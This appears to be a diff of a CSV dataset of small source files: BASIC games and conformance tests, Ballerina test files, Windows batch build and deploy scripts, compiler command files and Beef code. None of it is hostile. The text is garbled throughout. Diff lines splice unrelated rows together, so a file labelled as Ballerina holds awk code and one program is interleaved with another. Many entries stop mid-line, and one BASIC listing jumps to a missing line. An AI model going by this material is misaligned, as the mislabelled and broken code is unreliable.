DatasheetGridlinesColor =14806254 - RecSrcDt = Begin - 0x3be030954193e440 - End - DatasheetFontName =""Calibri"" - FilterOnLoad =0 - ShowPageMargins =0 - DisplayOnSharePointSite =1 - DatasheetAlternateBackColor =15921906 - DatasheetGridlinesColor12 =0 - FitToScreen =1 - DatasheetBackThemeColorIndex =1 - BorderThemeColorIndex =3 - ThemeFontIndex =1 - ForeThemeColorIndex =0 - AlternateBackThemeColorIndex =1 - AlternateBackShade =95.0 - Begin - Begin Label - BackStyle =0 - FontSize =11 - FontName =""Calibri"" - ThemeFontIndex =1 - BackThemeColorIndex =1 - BorderThemeColorIndex =0 -","177","0.9888268156424581","0.0","0.0" -"06451b9315acdee343a40bda854b59c646e1dade","BOWLING.BAS",".bas","BASIC","5 PRINT CHR$(26):WIDTH 80 -10 PRINT TAB(34);""BOWL"":PRINT -20 PRINT TAB(15);""CREATIVE COMPUTING MORRISTOWN, NEW JERSEY"" -30 PRINT:PRINT:PRINT -270 DIM C(15),A(100,6) -360 PRINT ""WELCOME TO THE ALLEY"" -450 PRINT ""BRING YOUR FRIENDS"" -540 PRINT ""OKAY LET'S FIRST GET ACQUAINTED"" -630 PRINT """" -720 PRINT ""THE INSTRUCTIONS (Y/N)"" -810 INPUT Z$ -900 IF Z$=""Y"" THEN 990 -960 IF Z$=""N"" THEN 1530 -990 PRINT ""THE GAME OF BOWLING TAKES MIND AND SKILL.DURING THE GAME"" -1080 PRINT ""THE COMPUTER WILL KEEP SCORE.YOU MAY COMPETE WITH"" -1170 PRINT ""OTHER PLAYERS[UP TO FOUR].YOU WILL BE PLAYING TEN FRAMES"" -1260 PRINT ""ON THE PIN DIAGRAM 'O' MEANS THE PIN IS DOWN...'+' MEANS T -1350 PRINT ""PIN IS STANDING.AFTER THE GAME THE COMPUTER WILL SHOW YOUR -1440 PRINT ""SCORES ."" -1530 PRINT ""FIRST OF ALL...HOW MANY ARE PLAYING""; -1620 INPUT R -1710 PRINT -1800 PRINT ""VERY GOOD..."" -1890 FOR I=1 TO 100: FOR J=1 TO 6: A(I,J)=0: NEXT J: NEXT I -1980 F=1 -2070 FOR P=1 TO R -2160 M=0 -2250 B=1 -2340 M=0: Q=0 -2430 FO","177","0.9888268156424581","0.0","0.0" -"00d6abf67d2791ef46b96bdcad3dc84d34aff39c","TEST.BAS",".bas","BASIC","'LINE (10, 10)-(20, 20) -SCREEN 12 -COLOR 4 -FOR x = 1 TO 100 - CIRCLE (100, 100), x -' SLEEP 1 -NEXT - -SOUND 100, 20 -PLAY ""c c# c c#"" - -","177","0.9888268156424581","0.0","0.0" -"2134854e24e33dcb37736d6d376684420007b79d","GAME_MAZE1.bas",".bas","BASIC",,"177","0.9888268156424581","0.0","0.0" -"13142aeb9579f606f2aa1629150aa23796b69ec4","symbol_at_cursor_import_test.bal",".bal","Ballerina","// Copyright (c) 2020 WSO2 Inc. (http://www.wso2.org) All Rights Reserved. +BEGIN { + if (ARGC == 1) { + print ""printf.awk "" + exit 1 + } + + show(""%a"") + show(""%A"") + show(""%c"") + show(""%d"") + show(""%03d"") + show(""%'d"") + show(""%e"") + show(""%E"") + show(""%f"") + show(""%F"") + show(""%.0f"") + show(""%.8f"") + show(""%g"") + show(""%.8g"") + show(""%G"") + show(""%i"") + show(""%o"") + show(""%s"") + show(""%40s"") + show(""%u"") + show(""%x"") + show(""%X"") + show(""%#x"") + show(""%#X"") +} +","185","0.8644859813084113","0.0","0.0" +"08fe16ac912daa615c6daef2dca5a72e5a760ad2","NAUCA026.BAS",".bas","BASIC","REM File: .bas +REM Data: +REM Programmer: Yuriy Lomako +REM Description: +REM ------------------------------------------------------------------- + +CLS +10 x = 0 +20 s = x * 900000000 +30 PRINT x; "" * 9000000000 = ""; s +40 x = x + 1 +50 GOTO 2 + + +","169","0.9135135135135135","0.0","0.0" +"0400c3001b22432c09230f9d5e88ff85469772a0","qryfrmTaskDBUI_cmbJobStatus.bas",".bas","BASIC","dbMemo ""SQL"" =""SELECT \""*\"" AS Status, \""*Show All\"" AS Label FROM cactblStatusTypes\015\012UNI"" + ""ON SELECT DISTINCT cactblStatusTypes.ID AS Status, cactblStatusTypes.StatusType "" + ""AS Label\015\012FROM cactblStatusTypes INNER JOIN cactblStatusTypesMM ON cactblS"" + ""tatusTypes.ID = cactblStatusTypesMM.StatusTypesTOPIDFK\015\012WHERE (((cactblSta"" + ""tusTypesMM.StatusTypeMIDIDFK)=648));\015\012"" +dbMemo ""Connect"" ="""" +dbBoolean ""ReturnsRecords"" =""-1"" +dbInteger ""ODBCTimeout"" =""0"" +dbByte ""RecordsetType"" =""0"" +dbBoolean ""OrderByOn"" =""0"" +dbByte ""Orientation"" =""0"" +dbByte ""DefaultView"" =""2"" +dbBoolean ""FilterOnLoad"" =""0"" +dbBoolean ""OrderByOnLoad"" =""-1"" +dbBoolean ""TotalsRow"" =""0"" +dbByte ""PublishToWeb"" =""1"" +dbBinary ""GUID"" = Begin + 0x27baa0f5cdd589488423638ce7f15fc3 +End +dbLongBinary ""DOL"" = Begin + 0x0acc0e5500000000000000000000000000000000000000000c00000005000000 , + 0x0000000000000000000000000000 +End +Begin + Begin + dbText ""Name"" =""Label"" + ","169","0.9135135135135135","0.0","0.0" +"0126ab77c2a8c7f1e1f5b982fad478f4739b5dfe","TEST.BAS",".bas","BASIC","10 REM PC-BASIC test +20 REM WRITE syntax +30 OPEN ""OUTPUT.TXT"" FOR OUTPUT AS 1 +40 ON ERROR GOTO 10000 +50 WRITE +60 WRITE, +70 WRITE 1 +80 WRITE 1, +90 WRITE ,1 +100 WRITE 1, A% +110 WRITE PRINT +120 WRITE 1 PRINT +130 WRITE 1, PRINT +150 WRITE#1 +160 WRITE#1, +170 WRITE#1 1 +180 WRITE#1 1, +190 WRITE#1 ,1 +210 WRITE#1 PRINT +220 WRITE#1, PRINT +230 WRITE#1, 1, PRINT +240 WRITE #1, 1, A%, 1#, ""One"" +9999 END +10000 PRINT#1, ERR, ERL +10010 RESUME NEXT +","169","0.9135135135135135","0.0","0.0" +"0ce8f7dec1d3bc1ee0a6006e25990bbb17344f52","P145.BAS",".bas","BASIC","10 PRINT ""PROGRAM FILE 145: ERROR - TWO ARGUMENTS IN LIST FOR"" +15 PRINT "" RND FUNCTION."" +20 PRINT "" ANSI STANDARD 7.2, 7.4, 8.2, 8.4"" +30 PRINT +40 PRINT ""SECTION 145.1: ERROR - TWO ARGUMENTS IN LIST FOR"" +45 PRINT "" RND FUNCTION."" +50 PRINT +60 PRINT ""THIS SECTION TESTS WHAT HAPPENS WHEN THE RND FUNCTION IS"" +70 PRINT ""INVOKED WITH TWO ARGUMENTS, INSTEAD OF NONE AS SPECIFIED"" +80 PRINT ""IN THE STANDARD."" +90 PRINT +100 PRINT ""THIS IS A TEST FOR A NON-STANDARD FEATURE OF MINIMAL BASIC."" +110 PRINT ""TO PASS THIS TEST, THE PROCESSOR MUST EITHER:"" +120 PRINT +130 PRINT "" 1) ACCEPT THE PROGRAM AND BE ACCOMPANIED BY DOCUMENTATION"" +140 PRINT "" ACCURATELY DESCRIBING THE FEATURE'S INTERPRETATION"" +150 PRINT "" BY THE PROCESSOR, OR"" +160 PRINT +170 PRINT "" 2) REJECT THE PROGRAM WITH AN APPROPRIATE ERROR MESSAGE"" +180 PRINT +190 PRINT ""SEE THE NBS MINIMAL BASIC TEST PROGRAMS USER'S MANUAL"" +200 PRINT ""FOR DETAILED CRITERIA."" +210 PRINT +220 PRINT "" BEGIN TEST"" +230 PRINT +240","169","0.9135135135135135","0.0","0.0" +"183e37cc23e90397c9e9ac8e9ea0f59c33d1c383","wumpus.bas",".bas","BASIC","PROGRAM LISTING +0010 REM- HUNT THE WUMPUS +0015 REM: BY GREGORY YOB +0020 PRINT ""INSTRUCTIONS (Y-N)""; +0030 INPUT I$ +0040 IF I$=""N"" THEN 52 +0050 GOSUB 1000 +0052 REM- ANNOUNCE WUMPUSII FOR ALL AFICIONADOS ... ADDED BY DAVE +0054 PRINT +0056 PRINT "" ATTENTION ALL WUMPUS LOVERS!!!"" +0058 PRINT "" THERE ARE NOW TWO ADDITIONS TO THE WUMPUS FAMILY""; +0060 PRINT "" OF PROGRAMS."" +0062 PRINT +0064 PRINT "" WUMP2: SOME DIFFERENT CAVE ARRANGEMENTS"" +0066 PRINT "" WUMP3: DIFFERENT HAZARDS"" +0067 PRINT +0068 REM- SET UP CAVE (DODECAHEDRAL NODE LIST) +0070 DIM S(20,3) +0080 FOR J=1 TO 20 +0090 FOR K=1 TO 3 +0100 READ S(J,K) +0110 NEXT K +0120 NEXT J +0130 DATA 2,5,8,1,3,10,2,4,12,3,5,14,1,4,6 +0140 DATA 5,7,15,6,8,17,1,7,9,8,10,18,2,9,11 +0150 DATA 10,12,19,3,11,13,12,14,20,4,13,15,6,14,16 +0160 DATA 15,17,20,7,16,18,9,17,19,11,18,20,13,16,19 +0170 DEF FNA(X)=INT(20*RND(0))+1 +0180 DEF FNB(X)=INT(3*RND(0))+1 +0190 DEF FNC(X)=INT(4*RND(0))+1 +0","169","0.9135135135135135","0.0","0.0" +"017a277c86a9cc04a26736dc5bba3284d613e323","http_simple_client.bal",".bal","Ballerina","// Copyright (c) 2018 WSO2 Inc. (http://www.wso2.org) All Rights Reserved. // // WSO2 Inc. licenses this file to you under the Apache License, // Version 2.0 (the ""License""); you may not use this file except @@ -7634,410 +8103,325 @@ PLAY ""c c# c c#"" // specific language governing permissions and limitations // under the License. -import testorg/testproject; - -function testImports() { - string s = testproject:TRUE; - int x = testproject:add(10, 20); +# Provides the HTTP remote functions for interacting with an HTTP server. Apart from the standard HTTP methods, `forward()` +# and `execute()` functions are provided. More complex and specific endpoint types can be created by wrapping this +# generic HTTP remote functions implementation. +# +# + url - The URL of the remote HTTP endpoint +#","189","0.9043062200956937","0.0","0.0" +"01afe8e805420c7caff9f1c38c8bad9d2240255b","eq2.bal",".bal","Ballerina"," +public type userPFoo object { + public int age; + public string name; + public string address; + public string zipcode = ""23468""; - testproject:Person p = {name: ""John Doe"", age: 20}; -} + public new (age, name, address) {} -function area(float radius) returns float { - return testproject:PI * radius * radius; -} + public function getName () returns (string); -function testMethodUsage() { - testproject:PersonObj p = n","234","1.0883720930232559","0.0","0.0" -"13d7cd5a95416bc14b53b8995662242d87fdf448","invalid-body-param.bal",".bal","Ballerina","import ballerina.net.http; -import ballerina.net.http.mock; + public function getAge () returns (int); +}; -endpoint echoEP { - port:9090 +function userPFoo::getName () returns (string) { + return self.name + "":userPFoo""; } -@http:serviceConfig { - basePath:""/signature"", - endpoints:[echoEP] +function userPFoo::getAge () returns (int) { + return self.age; } -service echo { +","189","0.9043062200956937","0.0","0.0" +"018fcaece5ed878eed2beb82a74adcea4576811d","crypto-test.bal",".bal","Ballerina","import ballerina.security.crypto; - @http:resourceConfig { - methods:[""POST""], - body:""person"" - } - resource echo1 (http:ServerConnector conn, http:Request req, string key, int person) { - http:Response res = {}; - _ = conn -> respond(res); - } +function testHmacWithMD5 (string base, string key) returns (string) { + return crypto:getHmac(base, key, crypto:Algorithm.MD5); } -","234","1.0883720930232559","0.0","0.0" -"090497cf7e9c1bdb916dd1dd8d076c3cb165ea42","type_conversion_test.bal",".bal","Ballerina","import ballerina/test; - -(any|error)?[] outputs = []; - -// This is the mock function that replaces the real function. -@test:Mock { - moduleName: ""ballerina/io"", - functionName: ""println"" -} -public function mockPrint(any|error... s) { - outputs.push(...s); -} - -@test:Config {} -function testFunc() { - // Invoking the main function - main(); - test:assertEquals(outputs[0], ""Employee to Person, name: ""); - test:assertEquals(outputs[1], ""Jack Sparrow""); - test:assertEquals(outputs[2], ""map to Person, name: ""); - test:assertEquals(outputs[3], ""Hector Barbossa""); - test:assertEquals(outputs[4], ""Error occurred on conversion: ""); - test:assertEquals(outputs[5].toString(), - ""message='map' value cannot be converted to 'type-conversion:Person'""); - test:assertEquals(outputs[6], ""int value: ""); - test:assertEquals(outputs[7], 45); - test:assertEquals(outputs[8], ""error: ""); - test:assertEquals(outputs[9].toString(), ""message='string' ","234","1.0883720930232559","0.0","0.0" -"0d7dc5f42708ec20600f244a40ccd8ecdebe9420","table-iteration.bal",".bal","Ballerina","import ballerina/sql; - -type Person { - int id; - int age; - float salary; - string name; -}; - -type ResultCount { - int COUNTVAL; -}; - -type Employee { - int id; - string name; - float salary; -}; - -type EmployeeCompatible { - int id; - string name; - float salary; -}; - -type EmployeeSalary { - int id; - float salary; -}; - -type EmployeeSalaryCompatible { - int id; - float salary; -}; - -int idValue = -1; -int ageValue = -1; -float salValue = -1; -string nameValue = """"; - -function testForEachInTableWithStmt () returns (int, int, float, string) { - endpoint sql:Client testDB { - url: ""hsqldb:file:./target/tempdb/TEST_DATA_TABLE__ITR_DB"", - username: ""SA"", - poolOptions: {maximumPoolSize:1} - }; - - var temp = testDB -> select(""SELECT * from Person where id = 1"", Person); - table dt = check temp; - - int id; - int age; - float salary; - string name; - - foreach x in dt { - id = x.id; - age = x.age; - salary = x.salar","234","1.0883720930232559","0.0","0.0" -"0643cbe8e6097d69084646793a170aaaf8a3e355","annotationInSameModule4.bal",".bal","Ballerina","import ballerina/'lang\.object as lang; -type Annot record { - string foo; - int bar?; -}; -public annotation Annot v1 on type; -annotation Annot[] v2 on object type; -public annotation Annot v3 on function; -annotation map v4 on object function; -public annotation map v5 on resource function; -annotation Annot v6 on parameter; -public annotation v7 on return; -annotation Annot[] v8 on service; - -string strValue = ""v1 value""; - -listener Listener lis = new; +function testHmacWithSHA1 (string base, string key) returns (string) { + return crypto:getHmac(base, key, crypto:Algorithm.SHA1); +} -string v8a = ""v8a""; +function testHmacWithSHA256 (string base, string key) returns (string) { + return crypto:getHmac(base, key, crypto:Algorithm.SHA256); +} -@ -service ser on lis { +function testHashWithMD5 (string base) returns (string) { + return crypto:getHash(base, crypto:Algorithm.MD5); +} - resource function res(@v6 { foo: ""v64"" } int intVal) returns @v7 string { - return """"; - } +function testHashWithSHA1 (string base) returns (string) { + return crypto:getHash(base, crypto:Algorithm.SHA1); } -type Listener object { - *lang:AbstractListener; +function testHashWithSHA256 (string base) returns (string) { + return crypto:getHash(base, crypto:Algorithm.SHA256); +} +","189","0.9043062200956937","0.0","0.0" +"067885cdb38ac378495fe77f05b9c1d6d2cbe217","createVariableInServiceMethod.bal",".bal","Ballerina","import ballerina/module1; - public function __init() { - } +function createIntWithError() returns int|error { + return 10; +} - public function __attach(service s, string? name = ()) returns error? { - } +public listener module1:Listener lst = new module1:Listener(23); - public function __start() returns error? { +service / on lst { + resource function get getResource() { + createIntWithError() } - - public function __gracefulStop() returns error? { - return (); + + remote function onCreate(TestClass cc) { + createIntWithError() } - - public function __immediateStop() returns error? { - return (); -","234","1.0883720930232559","0.0","0.0" -"0d3153bff84382d144719d2d5f411b8168ec8ad6","build.bat",".bat","Batchfile","browserify -t coffeeify js --extension="".coffee"" -o datepicker.js","5297","0.5174872997264557","1.8878610534264677E-4","0.004342080422880876" -"0d2c96e45c8fa39ad19dd49714d7c1c605d50961","filegen.bat",".bat","Batchfile","@java -cp . ai.aitia.CmdLineFileGen %* -","5297","0.5174872997264557","1.8878610534264677E-4","0.004342080422880876" -"17f6d6700dc9e32c7a48d26471646e169b3d2710","HyperVDisable.bat",".bat","Batchfile","@ECHO OFF -PowerShell -Command ""Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All"" -pause","5297","0.5174872997264557","1.8878610534264677E-4","0.004342080422880876" -"1c6e32d5768e24de77e3905b287326935a03699d","start8080.bat",".bat","Batchfile","@echo off -java -jar blog-0.0.1-SNAPSHOT.jar","5297","0.5174872997264557","1.8878610534264677E-4","0.004342080422880876" -"1319086393833426effc804df3dff2c84e4b3f5d","upload_tester_firmware.bat",".bat","Batchfile","avrdude -U ""lfuse:r:-:h"" -U ""hfuse:r:-:h"" -U ""efuse:r:-:h"" -U ""lock:r:-:h"" -s -c usbasp -p m128 -avrdude -s -c usbasp -p m128 -U ""flash:w:firmware\tester\build\ic-tester-main.hex:a"" -","5297","0.5174872997264557","1.8878610534264677E-4","0.004342080422880876" -"133e0630c1ab2585d36ebe037db07831c96983f5",".ext4.o.cmd",".cmd","Batchfile","cmd_cmd/ext4.o := arm-linux-gnueabi-gcc -Wp,-MD,cmd/.ext4.o.d -nostdinc -isystem /usr/lib/gcc-cross/arm-linux-gnueabi/5/include -Iinclude -I./arch/arm/include -include ./include/linux/kconfig.h -D__KERNEL__ -D__UBOOT__ -Wall -Wstrict-prototypes -Wno-format-security -fno-builtin -ffreestanding -fshort-wchar -Os -fno-stack-protector -fno-delete-null-pointer-checks -g -fstack-usage -Wno-format-nonliteral -Werror=date-time -D__ARM__ -marm -mno-thumb-interwork -mabi=aapcs-linux -mword-relocations -fno-pic -mno-unaligned-access -ffunction-sections -fdata-sections -fno-common -ffixed-r9 -msoft-float -pipe -march=armv7-a -D__LINUX_ARM_ARCH__=7 -D""KBUILD_STR(s)=\#s"" -D""KBUILD_BASENAME=KBUILD_STR(ext4)"" -D""KBUILD_MODNAME=KBUILD_STR(ext4)"" -c -o cmd/ext4.o cmd/ext4.c - -source_cmd/ext4.o := cmd/ext4.c - -deps_cmd/ext4.o := \ - $(wildcard include/config/cmd/usb.h) \ - $(wildcard include/config/usb/storage.h) \ - $(wildcard include/config/cmd/ext4/write.h) \ - include/common.h \ - $(wild","4972","0.4857366158655725","0.0","0.0012067578439259854" -"0a1e30dc1bab917c409dc6404497c2f0199a0553",".efx_lic.o.cmd",".cmd","Batchfile","cmd_efx_lic.o = gcc -Wp,-MD,./.efx_lic.o.d.tmp -m64 -pthread -march=native -DRTE_MACHINE_CPUFLAG_SSE -DRTE_MACHINE_CPUFLAG_SSE2 -DRTE_MACHINE_CPUFLAG_SSE3 -DRTE_MACHINE_CPUFLAG_SSSE3 -DRTE_MACHINE_CPUFLAG_SSE4_1 -DRTE_MACHINE_CPUFLAG_SSE4_2 -DRTE_MACHINE_CPUFLAG_AES -DRTE_MACHINE_CPUFLAG_PCLMULQDQ -DRTE_MACHINE_CPUFLAG_AVX -DRTE_MACHINE_CPUFLAG_RDRAND -DRTE_MACHINE_CPUFLAG_FSGSBASE -DRTE_MACHINE_CPUFLAG_F16C -DRTE_MACHINE_CPUFLAG_AVX2 -I/home/togo/work/mtcp/dpdk/x86_64-native-linuxapp-gcc/include -include /home/togo/work/mtcp/dpdk/x86_64-native-linuxapp-gcc/include/rte_config.h -DALLOW_EXPERIMENTAL_API -I/home/togo/work/mtcp/dpdk/drivers/net/sfc/base/ -I/home/togo/work/mtcp/dpdk/drivers/net/sfc -O3 -W -Wall -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wold-style-definition -Wpointer-arith -Wcast-align -Wnested-externs -Wcast-qual -Wformat-nonliteral -Wformat-security -Wundef -Wwrite-strings -Wdeprecated -Wno-strict-aliasing -Wextra -Wdisabled-optimization -Waggre","4972","0.4857366158655725","0.0","0.0012067578439259854" -"009259ba2d3ae121b0aac9ebabb5d2780d358b39",".i2c_tools.o.cmd",".cmd","Batchfile","cmd_miscutils/i2c_tools.o := gcc -Wp,-MD,miscutils/.i2c_tools.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D""BB_VER=KBUILD_STR(1.29.3)"" -Wall -Wshadow -Wwrite-strings -Wundef -Wstrict-prototypes -Wunused -Wunused-parameter -Wunused-function -Wunused-value -Wmissing-prototypes -Wmissing-declarations -Wno-format-security -Wdeclaration-after-statement -Wold-style-definition -fno-builtin-strlen -finline-limit=0 -fomit-frame-pointer -ffunction-sections -fdata-sections -fno-guess-branch-probability -funsigned-char -static-libgcc -falign-functions=1 -falign-jumps=1 -falign-labels=1 -falign-loops=1 -fno-unwind-tables -fno-asynchronous-unwind-tables -fno-builtin-printf -Os -D""KBUILD_STR(s)=\#s"" -D""KBUILD_BASENAME=KBUILD_STR(i2c_tools)"" -D""KBUILD_MODNAME=KBUILD_STR(i2c_tools)"" -c -o miscutils/i2c_tools.o miscutils/i2c_tools.c - -deps_miscutils/i2c_tools.o := \ - miscutils/i2c_tools.c \","4972","0.4857366158655725","0.0","0.0012067578439259854" -"09d0ffb048b68a4722b5f06580ae87a3d817e803",".seq_oss_init.o.cmd",".cmd","Batchfile","cmd_sound/core/seq/oss/seq_oss_init.o := /home/john/sources/toolchain-zefie/usr/bin/arm-linux-uclibcgnueabi-gcc -Wp,-MD,sound/core/seq/oss/.seq_oss_init.o.d -nostdinc -isystem /home/john/sources/toolchain-zefie/usr/bin/../lib/gcc/arm-linux-uclibcgnueabi/4.3.4/include -Iinclude -I/home/john/sources/littlekernel-m900-eclair/src/kernel/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-s3c6400/include -Iarch/arm/mach-s3c6410/include -Iarch/arm/plat-s3c64xx/include -Iarch/arm/plat-s3c/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -O2 -marm -fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=aapcs-linux -mno-thumb-interwork -D__LINUX_ARM_ARCH__=6 -march=armv6k -mtune=arm1136j-s -msoft-float -Uarm -fno-stack-protector -I/modules/include -fno-omit-frame-pointer -fno-optimize-sibling-calls -Wdeclaration-after-statement -Wno-pointer-sign -fwrapv -D""KBUILD_STR(s)=\","4972","0.4857366158655725","0.0","0.0012067578439259854" -"1c187dfdbfedaef4ca8c2f8cf992de5dad8ab441","rm.cmd",".cmd","Batchfile","@echo off - -setlocal EnableDelayedExpansion -REM batch script doesn't have a $# equivalent. the following script is the best so far -set argC=0 -for %%x in (%*) do Set /A argC+=1 -@rem echo %argC% - -@REM batch script has no != operator. use NOT == instead -if %argC% == 0 ( - @echo ERROR: wrong number of args. got %argC%, expected 2. args=%* - @echo userage: - @echo rm path1 path2 ... - @echo rm path1 path2 ... - @echo or use windows commands: - @echo del /q /s file1 file2 ... - @echo rmdir /q /s dir1 dir2 ... - @echo /q quiet, /s recurisve - @echo powershell -ExecutionPolicy Bypass remove-item -fo -r -path path1, path2, ... - exit /b -) - -@rem OR operator in windows batch can be implemented using this pattern -@rem https://stackoverflow.com/questions/8438511/if-or-if-in-a-windows-batch-file -set ""unix_style="" -if ""%1"" == ""-fr"" set unix_style=1 -if ""%1"" == ""-rf"" set unix_style=1 -if defined unix_style ( - set start=1 -) else ( - set start=0 -) - -@rem de","4972","0.4857366158655725","0.0","0.0012067578439259854" -"067cb97f85f5acd52f4e0906f7ac1b34b2449b28","snapshot.mag.no.sphere.Npol.6.Plen.100.Nlinks.200.D.15.la.7.phi_mag.0.05.999.bf",".bf","Beef","{particles {id pos type dip} - {0 5.0547211417141655 -6.853441639639328 24.52382246269289 1 0.0 -0.0 0.0} - {1 5.919117867237517 -6.583277340055227 25.244719952829072 1 0.0 -0.0 0.0} - {2 5.642917581526859 -5.989616089791506 24.422813272872993 1 0.0 -0.0 -0.0} - {3 5.642085343803726 -6.3291318709551 23.503485022641385 1 -0.0 -0.0 -0.0} - {4 4.688878840539122 -6.276040847050453 23.10917265936706 1 0.0 0.0 -0.0} - {5 5.278362193611067 -5.6262773293317 22.503160783008177 1 -0.0 0.0 -0.0} - {6 6.05787083548954 -6.302017643871935 22.51666181527453 1 -0.0 0.0 -0.0} - {7 6.713692716011626 -6.309732498955375 23.273322350854908 1 -0.0 -0.0 -0.0} - {8 7.456951101984459 -5.902640332413155 23.71812975249221 1 0.0 -0.0 0.0} - {9 7.438892969708516 -6.805002967642974 24.275494631440147 1 -0.0 0.0 0.0} - {10 8.246846546631192 -7.368058280855481 24.76834792725428 1 0.0 -0.0 0.0} - {11 9.11124324127735 -6.974455592626306 24.405740669481133 1 -0.0 0.0 0.0} - {12 8.68220042398896 -7.670573337981821 23.767152362600413","23","1.4375","0.0","0.0" -"0ef186727e51144ceb14a260980aaaf136f5d8cc","Dictionary.bf",".bf","Beef","// This file contains portions of code released by Microsoft under the MIT license as part -// of an open-sourcing initiative in 2014 of the C# core libraries. -// The original source was submitted to https://github.com/Microsoft/referencesource - -#if PARANOID -#define VERSION_DICTIONARY -#endif - -namespace System.Collections -{ - using System; - using System.Collections; - using System.Diagnostics; - using System.Diagnostics.Contracts; - using System.Threading; - - public class Dictionary : - ICollection<(TKey key, TValue value)>, - IEnumerable<(TKey key, TValue value)>, - IRefEnumerable<(TKey key, TValue* valueRef)> where TKey : IHashable - { - typealias KeyValuePair=(TKey key, TValue value); - typealias KeyRefValuePair=(TKey key, TValue* valueRef); - - private struct Entry - { - public TKey mKey; // Key of entry - public TValue mValue; // Value of entry - public int32 mHashCode; // Lower 31 bits of hash code, -1 if unused - public int_cosize mNext; /","23","1.4375","0.0","0.0" -"140bfdb31b4218d6abd452f835bf038d5ae0ec50","main.bf",".bf","Beef"," -//♀Farts -//Ãjaxa̐ḁ - -//#if false - -#pragma warning disable 168 - -//zab1234 - -// Zoop -//using IDE; -using System; -//using System.Threading; -using System.Collections; -using System.Diagnostics; -using System.Collections; -using System.Collections; -using System.Threading; - -// Disable unused variable warning -#pragma warning disable 168 - -public enum QIntDisplayType -{ - Default, - Decimal, - Hexadecimal, - Binary, - COUNT } +","189","0.9043062200956937","0.0","0.0" +"0f8f83fee433ddfa062c29ab33b6810c94a0c322","helloWorld.bal",".bal","Ballerina"," +import ballerina/io; -[CRepr] -public struct ALLEGRO_COLOR -{ - public float r, g, b, a; +function main (string... args) returns (int) { + io:println(""Hello, World! "" + args[0]); + + return 0; } +","189","0.9043062200956937","0.0","0.0" +"095249119291990d1f92e1c56f12e128f9fc83f9","deploy.bat",".bat","Batchfile","cd %CATALINA_HOME%\webapps +DEL %CATALINA_HOME%\webapps\testtask-restservice-1.0-SNAPSHOT.war +rd %CATALINA_HOME%\webapps\testtask-restservice-1.0-SNAPSHOT /s /q +DEL %CATALINA_HOME%\webapps\testtask-webapplication-1.0-SNAPSHOT.war +rd %CATALINA_HOME%\webapps\testtask-webapplication-1.0-SNAPSHOT /s /q +move %CD%\\testtask-restservice\target\testtask-restservice-1.0-SNAPSHOT.war %CATALINA_HOME%\webapps +move %CD%\\testtask-webapplication\target\testtask-webapplication-1.0-SNAPSHOT.war %CATALINA_HOME%\webapps +cd %CATALINA_HOME%\bin +%CATALINA_HOME%\bin\startup.bat +","5406","0.5263362866322656","0.0","0.00388457269700333" +"06c56740399724b9d70662c1406b1fb64eb4f7b4","astviewer.bat",".bat","Batchfile","java -cp ../build;../lib/pmd-1.8.jar;../lib/xercesImpl-2.0.2.jar;../lib/xmlParserAPIs-2.0.2.jar;../lib/jaxen-core-1.0-fcs.jar;../lib/saxpath-1.0-fcs.jar net.sourceforge.pmd.util.ASTViewer +","5406","0.5263362866322656","0.0","0.00388457269700333" +"0fd9d2d2d7748f156a2836a4d279e1aa8d246192","ajbrowser.bat",".bat","Batchfile","@echo off +if exist ""%JAVA_HOME%\bin\java.exe"" goto haveJava +if exist ""%JAVA_HOME%\bin\java.bat"" goto haveJava +if exist ""%JAVA_HOME%\bin\java"" goto haveJava +echo java does not exist as %JAVA_HOME%\bin\java +echo please fix the JAVA_HOME environment variable + +:haveJava +""%JAVA_HOME%\bin\java"" -classpath ""%ASPECTJ_HOME%\lib\aspectjtools.jar;%JAVA_HOME%\lib\tools.jar;%CLASSPATH%"" -Xmx64M org.aspectj.tools.ajbrowser.Main %1 %2 %3 %4 %5 %6 %7 %8 %9 +","5406","0.5263362866322656","0.0","0.00388457269700333" +"03d28a9e143eabd9eba6eb1eb315b33e5214fa20","svc.bat",".bat","Batchfile","@echo off + +:setvars +:: need user input +:: must +set dllfullpath="""" +:: not must +set proxyfilefullpath="""" + +set in= +set dllpath= +set svcutilpath=""%C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Bin\NETFX 4.0 Tools%"" +set defaultproxyfilename=WebServiceProxy.cs + +:parseargs +if ""%1""==""/?"" ( + goto :usage +) -namespace Hey.Dude.Bro -{ - class TestClass - { - static int gApzong = 123; +if ""%1""=="""" ( + goto :checkargs +) else if /I ""%1""==""-dll"" ( + set dllfullpath=""%2"" + shift +) else if /I ""%1""==""-cs"" ( + set proxyfilefullpath=""%2"" + shift +) else goto :checkargs +shift +goto :parseargs - [CLink, StdCall] - public static extern void OutputDebugStringA(char8* str); +:checkargs: +if %dllfullpath%=="""" goto :input +if %proxyfilefullpath%=="""" goto :input - /*[CLink, StdCall] - internal static extern void OutputDebugStringW(char16* str);*/ +:begin +c: +cd %svcutilpath% +set generatefilepath=%dllpath%GFile +if %proxyfilefullpath%=="""" set proxyfilefullpath=""%generatefilepath%\%defaultproxyfilename%"" +SvcUtil.exe %dllfullpath% /directory:""%generatefilepath%"" - [CLink, StdCall] - public static extern uint32 GetTickCount(); +if %errorlevel% NEQ 0 ( + pause +) else ( + svcutil.exe /t:code ""%generatefilepath%\*.wsdl"" ""%generatefilepath%\*.xsd"" /o:%proxyfilefullpath% +) +goto :end + +:input +:inputDllFullPath +set in= +set /p in=plea","5406","0.5263362866322656","0.0","0.00388457269700333" +"0872cb52c6da151adc6a03545b34aa8d144a158e","COMPLIB.BAT",".bat","Batchfile","g:\local\tc\bin\tcc -c -DTURBOC -Iv: -Ig:\local\tc\include v:*.c +g:\local\tc\tasm /Mx v:*.asm +copy v:proto.lib xinu.lib +for %%j in (*.obj) do g:\local\tc\bin\tlib /C xinu.lib+%%j +","5406","0.5263362866322656","0.0","0.00388457269700333" +"0dfeb16bfd98c1b2f9e49f90a89ff7d1ac2ca0cb","initScript.cmd",".cmd","Batchfile","npm i --save uuid +npm i --save 